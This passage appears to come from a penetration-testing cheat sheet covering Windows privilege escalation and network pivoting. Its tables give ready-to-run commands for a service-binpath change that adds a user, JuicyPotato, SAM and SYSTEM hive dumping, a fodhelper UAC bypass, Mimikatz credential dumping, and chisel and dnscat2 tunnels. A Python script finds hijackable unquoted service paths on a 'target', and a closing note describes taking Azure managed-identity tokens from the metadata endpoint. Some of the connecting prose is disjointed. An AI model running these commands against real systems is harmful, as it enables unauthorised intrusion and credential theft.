| # | Trick | Command / Technique |
|---|-------|----------------------|
| 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated (repeat for HKCU; the trick only works when the value is 0x1 in both hives) |
| 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode |
| 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath= "cmd.exe /c net user hacker pass /add" (the space after binpath= is required by sc) |
| 34 | SeImpersonate (Potato family) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * |
| 35 | Saved RDP credentials | cmdkey /list → runas /savecred /user:<saved account> cmd.exe |
| 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save and reg save hklm\system system.save (requires admin) |
| 37 | Writable %PATH% folders | where.exe whoami shows the lookup order; check the ACLs of each %PATH% directory and drop your own whoami.exe in a writable one that is searched first |
| 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe |
| 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command (default value = your command, plus an empty DelegateExecute value), then run fodhelper.exe |
| 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" |
| ... | ... | ... |
| 60 | Mimikatz sekurlsa | privilege::debug then sekurlsa::logonpasswords |
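Tricks 31 and 32 are the two in this table with real logic behind them rather than a single command to remember, so here is an added worked example (my own code, not HackTricks' content) that triages both offline. It parses captured output of the two commands in the table, computes every path Windows tries before the real binary of an unquoted service (CreateProcess cuts the command line at each space and appends .exe when the fragment has no extension), and checks AlwaysInstallElevated in both hives. All wmic and reg output below is constructed for the example; the service names and paths are made up.

```python
"""Offline triage for tricks 31 and 32: unquoted service paths and
AlwaysInstallElevated, parsed from captured command output."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample of: wmic service get name,displayname,pathname,startmode
WMIC_OUTPUT = """\
DisplayName                Name         PathName                                                 StartMode
Windows Update             wuauserv     C:\\Windows\\system32\\svchost.exe -k netsvcs               Manual
Vulnerable Backup Service  VulnBackup   C:\\Program Files\\Backup Tools\\Agent\\backup svc.exe       Auto
Quoted Vendor Service      QuotedSvc    "C:\\Program Files\\Quoted Vendor\\svc.exe" -run            Auto
Another Vendor Service     AnotherSvc   C:\\Program Files\\Another Vendor\\another.exe /service      Manual
"""

# Constructed samples of: reg query <hive>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REG_BOTH_SET = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
REG_HKLM_ONLY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

ERROR: The system was unable to find the specified registry key or value.
"""

# wmic prints whitespace-aligned columns separated by 2+ spaces; the header
# line never matches because "StartMode" is not a valid start mode.
WMIC_LINE = re.compile(
    r"^(?P<display>.+?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>.+?)\s{2,}"
    r"(?P<start>Auto|Manual|Disabled|Boot|System)\s*$"
)


@dataclass
class Service:
    name: str
    display: str
    pathname: str  # full command line as stored in the service's ImagePath
    startmode: str


def parse_wmic(text: str) -> list[Service]:
    rows = [WMIC_LINE.match(line.rstrip()) for line in text.splitlines()]
    return [Service(m["name"], m["display"], m["path"], m["start"]) for m in rows if m]


def binary_path(cmdline: str) -> tuple[str, bool]:
    """Return (service binary path, was_quoted). Quoted -> text inside the first
    pair of quotes; unquoted -> cut at the first '.exe' (the usual heuristic)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end != -1 else s[1:]), True
    m = re.search(r"\.exe", s, re.IGNORECASE)
    return (s[: m.end()] if m else s), False


def hijack_candidates(unquoted_path: str) -> list[str]:
    """Paths Windows tries before the real binary, in order. Write access to
    the directory of any one of them is enough to plant a binary."""
    out = []
    for i, ch in enumerate(unquoted_path):
        if ch == " ":
            frag = unquoted_path[:i]
            if "." not in frag.rsplit("\\", 1)[-1]:  # no extension -> .exe appended
                frag += ".exe"
            out.append(frag)
    return out


def unquoted_service_findings(wmic_text: str, skip_prefix: str = "C:\\Windows\\") -> list[dict]:
    """Services whose binary path is unquoted and contains a space. Paths under
    skip_prefix are dropped, like the usual findstr /v "C:\\Windows\\\\" filter."""
    findings = []
    for svc in parse_wmic(wmic_text):
        path, quoted = binary_path(svc.pathname)
        if quoted or " " not in path or path.lower().startswith(skip_prefix.lower()):
            continue
        findings.append({"service": svc.name, "startmode": svc.startmode,
                         "binary": path, "write_here": hijack_candidates(path)})
    return findings


def always_install_elevated(reg_text: str) -> dict:
    """Parse concatenated reg query output for HKLM and HKCU. The MSI trick
    needs the value set to 1 in BOTH hives; a missing key (reg prints an
    ERROR line instead) counts as not set."""
    state = {"HKLM": False, "HKCU": False}
    hive = None
    for line in reg_text.splitlines():
        if line.startswith("HKEY_LOCAL_MACHINE\\"):
            hive = "HKLM"
        elif line.startswith("HKEY_CURRENT_USER\\"):
            hive = "HKCU"
        elif hive:
            m = re.match(r"\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)", line)
            if m:
                state[hive] = int(m.group(1), 16) == 1
    state["exploitable"] = state["HKLM"] and state["HKCU"]
    return state


if __name__ == "__main__":
    for f in unquoted_service_findings(WMIC_OUTPUT):
        print(f"[{f['startmode']}] {f['service']}: {f['binary']}")
        for p in f["write_here"]:
            print("    try:", p)
    print("AlwaysInstallElevated:", always_install_elevated(REG_BOTH_SET))
    print("AlwaysInstallElevated:", always_install_elevated(REG_HKLM_ONLY))
```

Run it with saved wmic and reg output piped in from the target and you get, per service, the exact directories you need write access to (check them with icacls) and whether the service auto-starts, which decides whether you need a reboot or a stop/start right on the service. The quoted service is correctly ignored, and a service under C:\Windows is dropped because those directories are not writable by a normal user.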
So, what makes the cut? According to aggregated community rankings, the "HackTricks 179 best" techniques fall into four critical categories. Below is a breakdown of the top sections you should know by heart.
If you get stuck on a specific technique, HackTricks and similar platforms have community forums or discussion channels where you can post a question and get pointers from other users.
| # | Trick | Command |
|---|-------|---------|
| 126 | SSH dynamic port forward | ssh -D 1080 user@target |
| 127 | Chisel SOCKS5 | chisel client server:8000 socks |
| 128 | Ligolo-ng tunnel | ligolo-proxy -selfcert (attacker side; the agent runs on the pivot host) |
| 129 | Plink (Windows SSH) | plink.exe -ssh -R 1080 (reverse forward from a Windows pivot back to the attacker) |
| 130 | ICMP tunneling | ptunnel -p target -lp 8000 |
| 131 | DNS tunneling (dnscat2) | dnscat2-server domain.com |
| ... | ... | ... |
| 140 | Proxychains + nmap | proxychains nmap -sT -Pn 10.0.0.1 (-sT because SOCKS only relays full TCP connects; -Pn because ICMP ping does not traverse the proxy) |
Cloud workload identity misconfig (Azure Managed Identities) - A managed identity that has been granted more than its workload needs is a privilege-escalation path: anyone who can run code on the VM, App Service or function can request a token for that identity from the local instance metadata endpoint (169.254.169.254) and use it against Storage, Key Vault or any other resource the identity has a role on.